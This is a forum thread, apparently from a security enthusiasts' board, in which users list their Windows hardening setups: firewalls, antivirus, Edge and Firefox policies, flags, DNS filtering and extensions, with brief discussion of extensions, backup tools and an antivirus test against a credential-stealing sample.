What is your security setup these days?

Windows10
Main line of defense.........
Sphinx Firewall - AppGuard Solo - KeyScrambler - DeepFreeze

Other Software..........
Instant Recovery - AdGuard - AdGuard VPN - Proton Pass - Process Lasso

Occasional Scan.........
Emsisoft EEK + Eset Online

 

W.10 Home x64 22H2
Local Account - Standard user - Limited permissions
UAC maximum - Always notify
Cloudflare DNS
Onedrive,Cortana,Advertising ID,Web Search - disabled
Usage of location data for Cortana disabled
Telemetry OFF
Removed some Windows optional features.

Microsoft Defender Firewall hardened with H_C.
Microsoft Defender hardened with Configure Defender (Customized level) - Cloud Block Level

• Ransomware protection - disabled
• No run in a sandbox
• Core Isolation: Memory integrity - disabled
• Some softwares hardened with maximum AE protection
• All Windows Exploit Protection options - enabled

MS Edge --disable-webgl --no-pings

• Home page: https://start.duckduckgo.com/
• Search engine = only DDG
• Enabled Security Mitigations - Strict
• Detection Protection - Strict
• Clipboard permissions - blocked
• Next DNS DOH - HaGeZi Multi PRO++ + OISD big
• Share browsing data with other Windows features - disabled
• Blocked cookies (also third parties):

Code:

abrahamjuliot.github.io
ntp.msn.com
c.msn.com
assets.msn.com
msn.com
microsoftedge.microsoft.com
fpt2.microsoft.com
browserleaks.com

Policies:

• AutomaticHttpsDefault = 2
• BrowserSignin = 0
• HideFirstRunExperience - true
• DnsOverHttpsMode = secure
• DnsOverHttpsTemplates = Next DNS
• TLSCipherSuiteDenyList = "0x002f","0x0035","0xc013","0x009c","0xc014","0x009d"
• HubsSidebarEnabled - false
• SyncDisabled - true
• AudioSandboxEnabled - true
• NetworkServiceSandboxEnabled - true
• Edge3PSerpTelemetryEnabled - false
• AllowSurfGame - false
• ExtensionManifestV2Availability= 2
• WebWidgetAllowed - false
• ShowRecommendationsEnabled - false
• ShowDownloadsInsecureWarningsEnabled = true
• ManagedSearchEngines = [{"allow_search_engine_discovery":false},{"is_default":true,"name":"DuckDuckGo","keyword":"duckduckgo.com","search_url":"https://duckduckgo.com/?q={searchTerms}","suggest_url":"https://www.duckduckgo.com/qbox?query={searchTerms}","image_search_url":"https://www.duckduckgo.com/images/detail/search?iss=sbiupload"}]
• ReadAloudEnabled - false

Edge://flags:

Enabled:

• Block scripts loaded via document.write
• TLS 1.3 Early Data
• Block insecure private network requests.
• Parallel downloading
• Automatic HTTPS
• Show block option in autoplay settings
• Experimental Tracking Prevention Features
• New PDF Viewer
• Strict-Origin-Isolation
• Bind cookies to their setting origin's port
• Bind cookies to their setting origin's scheme
• Origin-keyed Processes by default

Extensions:

• uBlock Origin Hard Mode with TLD's
• AdGuard AdBlocker v.5.x.x. Hard Mode with TLD's - off by default
• Stream Recorder - off by default
• Video DownloadHelper - off by default

Firefox

• Home page: https://start.duckduckgo.com/
• Search engine = only DDG
• Next DNS DOH - HaGeZi Multi PRO++ + OISD big
• Tracking protection: Strict
• DNS over HTTPS : Max Protection
• HTTPS-only-mode enabled
• Pocket disabled
• Clearing browsing data on exit
• Firefox telemetry disabled
• Protection against fraudulent content and dangerous software enabled - all enabled
• Some FastFox.js settings
• Some Arkenfox.js settings

Policies

• OverridePostUpdatePage set to ""
• DontCheckDefaultBrowser = true
• OverrideFirstRunPage set to ""

Extensions

• uBlock Origin - Hard Mode with TLD's
• Video DownloadHelper - off by default
• HLS Downloader - off by default

 

Windows10
Main line of defense.........
PortMaster Pro Firewall - AppGuard Solo - KeyScrambler Premium - DeepFreeze Standard

Other Software..........
Raxco Instant Recovery - Proton Pass Plus - Process Lasso Pro

Occasional Scan.........
Emsisoft EEK + Eset Online + DrWeb CureIt

 

W.10 Home x64 22H2
Local Account - Standard user - Limited permissions
UAC maximum - Always notify
Cloudflare DNS
Onedrive,Cortana,Advertising ID,Web Search - disabled
Usage of location data for Cortana disabled
Telemetry OFF
Removed some Windows optional features.

Microsoft Defender Firewall hardened with H_C.
Microsoft Defender hardened with Configure Defender (Customized level) - Cloud Block Level

• Ransomware protection - disabled
• No run in a sandbox
• Core Isolation: Memory integrity - disabled
• Some softwares hardened with maximum AE protection
• All Windows Exploit Protection options - enabled

MS Edge --disable-webgl --no-pings

• Home page: https://start.duckduckgo.com/
• Search engine = only DDG
• Enabled Security Mitigations - Balanced
• Detection Protection - Strict
• Scareware Blocker enabled
• Clipboard permissions - blocked
• Next DNS DOH - HaGeZi - Multi ULTIMATE + OISD big
• Share browsing data with other Windows features - disabled
• Blocked cookies (also third parties):

Code:

abrahamjuliot.github.io
ntp.msn.com
c.msn.com
assets.msn.com
msn.com
microsoftedge.microsoft.com
fpt2.microsoft.com
browserleaks.com

Policies:

• AutomaticHttpsDefault = 2
• BrowserSignin = 0
• HideFirstRunExperience - true
• DnsOverHttpsMode = secure
• DnsOverHttpsTemplates = Next DNS
• TLSCipherSuiteDenyList = "0x002f","0x0035","0xc013","0x009c","0xc014","0x009d"
• HubsSidebarEnabled - false
• SyncDisabled - true
• AudioSandboxEnabled - true
• NetworkServiceSandboxEnabled - true
• Edge3PSerpTelemetryEnabled - false
• AllowSurfGame - false
• ExtensionManifestV2Availability= 2
• WebWidgetAllowed - false
• ShowRecommendationsEnabled - false
• ShowDownloadsInsecureWarningsEnabled = true
• ManagedSearchEngines = [{"allow_search_engine_discovery":false},{"is_default":true,"name":"DuckDuckGo","keyword":"duckduckgo.com","search_url":"https://duckduckgo.com/?q={searchTerms}","suggest_url":"https://www.duckduckgo.com/qbox?query={searchTerms}","image_search_url":"https://www.duckduckgo.com/images/detail/search?iss=sbiupload"}]
• ReadAloudEnabled - false

Edge://flags:

Enabled:

• Block scripts loaded via document.write
• TLS 1.3 Early Data
• Block insecure private network requests.
• Parallel downloading
• Automatic HTTPS
• Show block option in autoplay settings
• Experimental Tracking Prevention Features
• New PDF Viewer
• Strict-Origin-Isolation
• Bind cookies to their setting origin's port
• Bind cookies to their setting origin's scheme
• Origin-keyed Processes by default

Extensions:

• uBlock Origin Hard Mode with TLD's
• AdGuard AdBlocker v.5.x.x. Hard Mode with TLD's - off by default
• Stream Recorder - off by default
• Video DownloadHelper - off by default

Firefox

• Home page: https://start.duckduckgo.com/
• Search engine = only DDG
• Next DNS DOH - HaGeZi Multi PRO++ + OISD big
• Tracking protection: Strict
• DNS over HTTPS : Max Protection
• HTTPS-only-mode enabled
• Pocket disabled
• Clearing browsing data on exit
• Firefox telemetry disabled
• Protection against fraudulent content and dangerous software enabled - all enabled
• Some FastFox.js settings
• Some Arkenfox.js settings

Policies

• OverridePostUpdatePage set to ""
• DontCheckDefaultBrowser = true
• OverrideFirstRunPage set to ""

Extensions

• uBlock Origin - Hard Mode with TLD's
• Video DownloadHelper - off by default
• HLS Downloader - off by default

In red the new features.

 

Windows10
Main line of defense.........
PortMaster Pro Firewall - AppGuard Solo - DeepFreeze Standard

Other Software..........
Raxco Instant Recovery - Proton Pass Plus - Process Lasso Pro

Occasional Scan.........
Emsisoft EEK + Eset Online + DrWeb CureIt

 

Eset Premium, AppGuard Solo, OSArmor, SysHardener.
And of course Macrium Reflect 8.

 

Windows 11 23H2
MS Defender
Aomei Backupper Pro
Windows built-in system image
Firefox - Privacy Badger
Edge - Privacy Badger

 

Hi,
can you explain why in both of your browsers you decided to use only PB?
TH.

 

I block mostly trackers and not concerned too much with ads. In fact, I rarely see any with the browsing I do. I keep µBO around primarily for paywalls, when needed.

 

Consider that not all trackers that appear to be blocked by PB highlighted in the extension GUI are actually blocked by PB,many are blocked only by Firefox's internal anti-trackers feature,Edge.
With Firefox's development tools (Edge always consider client) you can check this.

 

The same is true for µBO with my minimalist filter lists. Edge is similar.

What I like about PB is that it's sponsored by the Electronic Frontier Foundation and has very good, ongoing and regular maintenance. And no shady telemetry, etc.

 

Yes, I understand completely.
I too chose PB as the trackers control extension,in my tests, for the same reasons.

 

@LoneWolf,
Just a reminder that Raxco,.....
That Raxco had filed for Chapter 7 Bankruptcy. Upon going to their website discovered that it was indeed true.
Maybe it time to start for a replacement. Your thoughts, would be appreciated,....

What do you think about Ashampoo Backup Pro 26?
"Ashampoo Backup Pro 26 takes the fear out of viruses, ransomware and hardware errors!"
Just wondering?

 

Software still works fine here so I'll keep it for now. Only thing is once uninstalled that's it, no activations. I've no experience with Ashampoo so I can not comment either way.

 

Appreicate your insight @stapp and @LoneWolf, have a great evening!

 

W.10 Home x64 22H2
Local Account - Standard user - Limited permissions
UAC maximum - Always notify
Cloudflare DNS
Onedrive,Cortana,Advertising ID,Web Search - disabled
Usage of location data for Cortana disabled
Telemetry OFF
Removed some Windows optional features.

Microsoft Defender Firewall hardened with H_C.
Microsoft Defender hardened with Configure Defender (Customized level) - Cloud Block Level

• Ransomware protection - disabled
• No run in a sandbox
• Core Isolation: Memory integrity - disabled
• Some softwares hardened with maximum AE protection
• All Windows Exploit Protection options - enabled

MS Edge --disable-webgl --no-pings --enable-features="NetworkServiceSandbox,EnableCsrssLockdown,WinSboxDisableExtensionPoint"

• Home page: https://start.duckduckgo.com/
• Search engine = only DDG
• Enabled Security Mitigations - Balanced
• Detection Protection - Strict
• Scareware Blocker enabled
• Clipboard permissions - blocked
• Next DNS DOH - HaGeZi - Multi ULTIMATE + OISD big
• Share browsing data with other Windows features - disabled
• Blocked cookies (also third parties):

Code:

abrahamjuliot.github.io
ntp.msn.com
c.msn.com
assets.msn.com
msn.com
microsoftedge.microsoft.com
fpt2.microsoft.com
browserleaks.com

Policies:

• AutomaticHttpsDefault = 2
• BrowserSignin = 0
• HideFirstRunExperience - true
• DnsOverHttpsMode = secure
• DnsOverHttpsTemplates = Next DNS
• TLSCipherSuiteDenyList = "0x002f","0x0035","0xc013","0x009c","0xc014","0x009d"
• HubsSidebarEnabled - false
• SyncDisabled - true
• AudioSandboxEnabled - true
• NetworkServiceSandboxEnabled - true
• Edge3PSerpTelemetryEnabled - false
• AllowSurfGame - false
• ExtensionManifestV2Availability= 2
• WebWidgetAllowed - false
• ShowRecommendationsEnabled - false
• ShowDownloadsInsecureWarningsEnabled = true
• ManagedSearchEngines = [{"allow_search_engine_discovery":false},{"is_default":true,"name":"DuckDuckGo","keyword":"duckduckgo.com","search_url":"https://duckduckgo.com/?q={searchTerms}","suggest_url":"https://www.duckduckgo.com/qbox?query={searchTerms}","image_search_url":"https://www.duckduckgo.com/images/detail/search?iss=sbiupload"}]
• ReadAloudEnabled - false

Edge://flags:

Enabled:

• Block scripts loaded via document.write
• TLS 1.3 Early Data
• Block insecure private network requests.
• Parallel downloading
• Automatic HTTPS
• Show block option in autoplay settings
• Experimental Tracking Prevention Features
• New PDF Viewer
• Strict-Origin-Isolation
• Bind cookies to their setting origin's port
• Bind cookies to their setting origin's scheme
• Origin-keyed Processes by default

Extensions:

• uBlock Origin - Hard Mode with TLD's
• Stream Recorder - (off by default)
• Video DownloadHelper - (off by default)
• AdGuard AdBlocker v.5.x - Hard Mode with TLD's - (off by default)

Firefox

• Home page: https://start.duckduckgo.com/
• Search engine = only DDG
• Next DNS DOH - HaGeZi Multi PRO++ + OISD big
• Tracking protection: Strict
• DNS over HTTPS : Max Protection
• HTTPS-only-mode enabled
• Pocket disabled
• Clearing browsing data on exit
• Firefox telemetry disabled
• Protection against fraudulent content and dangerous software enabled - all enabled
• Some FastFox.js settings
• Some Arkenfox.js settings

Policies

• OverridePostUpdatePage set to ""
• DontCheckDefaultBrowser = true
• OverrideFirstRunPage set to ""

Extensions

• uBlock Origin - Hard Mode with TLD's
• Video DownloadHelper - (off by default)
• HLS Downloader - (off by default)

 

There are two "Ping Blocker" extensions on Edge/chrome store, which one are you using?

 

Ping Blocker 0.1.3 with CSP Report disabled.

 

I suggest everyone check out Carifred. They make excellent, free, software. In particular, check out the immunization function of UVK or the SOS suite. From what I can tell, they overlap in function. They are aimed at preventing maliciousness my disabling things like autorun manipulation. They've been a part of my security setip for years.

(link made purposefully unclickable)

www.carifred.com

 

Windows 11 Pro 24H2

Firewall & Anti-Virus:
Router (Hardware Firewall)
Windows Defender Firewall
Malwarebytes Premium 5.2.7.167

Blocking/Hardening:
AppGuard Solo 6.7.129.2
HitmanPro.Alert 3.20.2 Build 2019
Quad9 DNS
User Account Control (Always Notify)

 

Now running Sophos Home Premium with Netlimiter Blocker as kernel mode firewall. I set a block rule for powershell and scripting host to not to connect outside.
Two days ago i tested this combo against one malware, that stoles your browser credentials. As time of testing this malware, VT shows only 4 detections.
Simply put, this malware uses(in a legit way) powershell to run msiexec and msiexec downloads zero day malware to steal your browser credentials. So blocking powershell(or scripting host) connecting outside is useless in this case.
Emsisoft: Fails, browser credentials stolen and sent to a server
G Data: Fails, browser credentials stolen and sent to a server
Sophos Home Premium: Block (detected as Mitre ATT&CK T1555.003)

 

@moredhelfinland,
Details are so very important!
Thank you for sharing, very useful information.
What about OS Armor?

 

@Moose World
OSArmor is my first line of defense. Just enable all "suspicious" and malformed scripts protection, you're good to go. OSA uses its own driver, so it does rely on silly windows defender "ASR" rules etc...
And it reacts fast, its funny to see it to block while "your antivirus name here" still doing "cloud lookups" etc stuff.
BAD thing was about OSA renewing, i bought it 19.99 euros, renewing price was 24 euros. Wtf? Cancelled, and bought the OSA again 19.99. Saved 5 euros for more beer. lol.

 

I have a curiosity to ask all Wilders members who use Chromium-based browsers + Intel CPUs.
Has anyone enabled the sandbox in the browser for the RIDL attack and if so has anyone verified before/after a decrease in browser performance?

It would appear that there is a 20% decrease.

I have an AMD CPU so personally I am not concerned.